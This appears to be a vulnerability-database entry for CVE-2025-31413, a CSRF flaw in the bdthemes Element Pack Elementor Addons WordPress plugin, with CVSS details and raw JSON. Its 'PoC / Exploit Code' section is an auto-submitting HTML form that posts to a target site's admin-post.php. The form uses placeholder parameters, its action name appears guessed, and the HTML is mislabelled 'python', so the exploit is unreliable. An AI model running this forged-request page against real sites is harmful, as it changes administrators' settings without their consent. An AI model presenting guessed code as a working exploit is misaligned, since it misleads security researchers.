Security Vulnerability Report
中文
CVE-2025-31413 CVSS 4.3 MEDIUM

CVE-2025-31413

Published: 2026-01-22 17:15:54
Last Modified: 2026-04-27 16:16:27

Description

Cross-Site Request Forgery (CSRF) vulnerability in bdthemes Element Pack Elementor Addons bdthemes-element-pack-lite allows Cross Site Request Forgery.This issue affects Element Pack Elementor Addons: from n/a through <= 8.3.13.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

bdthemes-element-pack-lite <= 8.3.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-31413 --> <!-- Target: WordPress site with bdthemes-element-pack-lite <= 8.3.13 --> <!-- This PoC demonstrates a CSRF attack that could trigger plugin actions --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-31413</title> </head> <body> <h1>CSRF PoC for Element Pack Plugin</h1> <p>Click the button below to trigger the CSRF attack:</p> <!-- Auto-submit form targeting the vulnerable endpoint --> <form id="csrfForm" action="http://target-site/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Plugin's vulnerable action parameters --> <input type="hidden" name="action" value="element_pack_settings"> <input type="hidden" name="settings[some_vulnerable_option]" value="malicious_value"> <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=element_pack"> </form> <script> // Auto-submit on page load document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the request has been sent.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31413", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:54.130", "lastModified": "2026-04-27T16:16:27.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in bdthemes Element Pack Elementor Addons bdthemes-element-pack-lite allows Cross Site Request Forgery.This issue affects Element Pack Elementor Addons: from n/a through <= 8.3.13."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en bdthemes Element Pack Elementor Addons bdthemes-element-pack-lite permite la falsificación de petición en sitios cruzados. Este problema afecta a Element Pack Elementor Addons: desde n/a hasta &lt;= 8.3.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bdthemes-element-pack-lite/vulnerability/wordpress-element-pack-elementor-addons-plugin-8-3-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}